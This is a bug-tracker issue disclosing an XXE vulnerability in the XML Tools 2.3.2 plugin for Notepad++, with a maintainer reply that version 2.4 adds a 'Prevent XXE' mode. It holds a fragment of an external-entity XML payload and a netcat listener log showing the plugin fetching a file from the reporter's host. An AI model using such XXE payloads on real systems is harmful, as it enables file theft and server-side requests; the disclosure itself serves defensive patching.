XXE on XML Tools plugin 2.3.2

A plugin to improve Notepad++

Brought to you by: jenslorenz

#262 XXE on XML Tools plugin 2.3.2

Milestone: Not relevant

Status: open

Owner: Jens Lorenz

Labels: XXE (1)

Priority: 9

Updated: 2015-02-13

Created: 2015-01-25

Creator: Vahagn Vardanian

Private: No

XML tools for notepad++ have XXE vulnerability.

Where we install XML tools plugin on notepad++ and where he want to check XML files, for example

%remote;]>
<users>
<user>BC48F6077761C9197752A3990A2B396F</user>
<root>
</root></users>

XML tools send request to 188.187..:4444 and wait where hi download 1.xml file

root@vps-1062110:~# nc -l -vv -p 4444
listening on [any] 4444 ...
Warning: forward host lookup failed for dynamicip-188-187--.pppoe.volgograd.ertelecom.ru: Unknown host
connect to [109.120.--.--] from dynamicip-188-187--.pppoe.volgograd.ertelecom.ru [188.187..] 32805
GET /1.xml HTTP/1.0
Host: 109.120.--.--:4444
Accept-Encoding: gzip

2 Attachments

1.jpg

2.jpg

Discussion

Nicolas Crittin - 2015-02-13

The release 2.4 of XMLTools adds a "Prevent XXE" mode which should solve the problem.

If you would like to refer to this comment somewhere else in this project, copy and paste the following link:

Gen AI apps are built with MongoDB Atlas

Atlas offers built-in vector search and global availability across 125+ regions. Start building AI apps faster, all in one place.

Try Free →

XXE on XML Tools plugin 2.3.2

A plugin to improve Notepad++

Group

Searches

Help

#262 XXE on XML Tools plugin 2.3.2

Discussion